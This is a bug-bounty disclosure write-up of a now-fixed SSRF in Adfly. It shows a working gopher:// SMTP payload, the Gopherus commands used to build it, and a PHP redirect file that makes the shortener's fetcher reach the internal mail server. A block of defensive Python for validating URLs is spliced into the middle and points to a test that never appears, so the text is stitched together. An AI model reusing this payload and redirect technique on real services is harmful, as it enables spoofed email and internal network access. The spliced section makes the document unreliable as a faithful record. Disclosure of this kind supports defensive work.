Gain adfly SMTP access with SSRF via Gopher Protocol

Zerb0a
Jun 27, 2019 · 2 min read
(Image: Adfly logo)

Hi guys, my name is Rafli Pasya. Today I want to share my story about an SSRF on Adfly. I found this bug 4 days ago and it is already fixed.

Two months ago I found an IDOR on Adfly, and 4 days ago I found an SSRF on Adfly. Using this vulnerability I was able to send an email through Adfly's SMTP server. It is absolutely dangerous if another attacker used this to target Adfly's clients.

Exploitation

I prepared these tools:
1. Gopherus
2. A server to upload a PHP file to

First of all I tried to shorten a gopher:// URL directly, but it was blocked by the server. So I made a PHP file that redirects to the Gopherus payload, and that actually worked.

I opened a CMD and typed:
gopherus.py --exploit fastcgi
This is used to exploit FastCGI and gain RCE. Unfortunately, because I was unable to see the response body (only the <title> tag), this exploit did not work.

So I tried the SMTP exploit instead:
gopherus.py --exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]

Payload:
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.

Now I made a PHP file that answers every request with a redirect to that payload:

<?php
// Redirect the shortener's fetcher to the gopher:// SMTP payload
header('Location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.');
?>

and I uploaded it to my server.

Then I visited the Adfly site and shortened myserver.com/poc.php.

After 1–5 minutes I checked my inbox and saw an email from adf@ly.adf.ly.
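The root cause above is a fetcher that follows a redirect into an arbitrary scheme and host. As an added example, not code from the original write-up or from Adfly, here is the server-side check a URL shortener would need: it validates scheme, port and the resolved address of the requested URL, and re-validates every redirect hop itself, so a 302 to gopher://127.0.0.1:25 is refused instead of followed. The names check_target, follow_safely and the fetch/resolve callables are assumptions, not a real library API.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

def resolve_all(host):
    """Default resolver: every IPv4/IPv6 address the name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_target(url, resolve=resolve_all):
    """Return None if url may be fetched, otherwise the reason to refuse it."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:  # blocks gopher://, file://, ...
        return f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return "missing host"
    if parts.port is not None and parts.port not in ALLOWED_PORTS:  # no :25, :9000
        return f"port {parts.port} not allowed"
    try:
        addrs = {ipaddress.ip_address(parts.hostname)}  # literal IP, no DNS needed
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(parts.hostname)}
        except (socket.gaierror, ValueError):
            return "unresolvable host"  # fail closed
    for addr in addrs:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        if not addr.is_global:  # loopback, RFC 1918, link-local, etc.
            return f"host resolves to non-public address {addr}"
    return None

def follow_safely(url, fetch, resolve=resolve_all, max_hops=5):
    """Fetch url, re-checking every redirect hop ourselves.

    fetch(url) -> (status, headers, body); it must NOT auto-follow redirects and
    headers is a dict keyed 'Location'. Returns (final_url, status, body).
    """
    for _ in range(max_hops + 1):
        reason = check_target(url, resolve)
        if reason:
            raise ValueError(f"refused {url}: {reason}")
        status, headers, body = fetch(url)
        if not (300 <= status < 400 and headers.get("Location")):
            return url, status, body
        url = urljoin(url, headers["Location"])  # validated on the next pass
    raise ValueError("too many redirects")
```

The test below wires in a constructed fetch that answers poc.php with a 302 to the page's gopher payload, and a constructed resolver so it runs offline.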


I quickly reported this bug to their team. It was fixed 1 day after I reported it.

Thanks for reading, sorry for my bad English btw.

Original write-up:
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html

Timeline:

- Sunday 23 June 2019 23:35 GMT+7 = Bug Found & Reported

- Monday 24 June 2019 17:16 GMT+7 = Triaged

- Monday 24 June 2019 22:34 GMT+7 = Bug Fixed
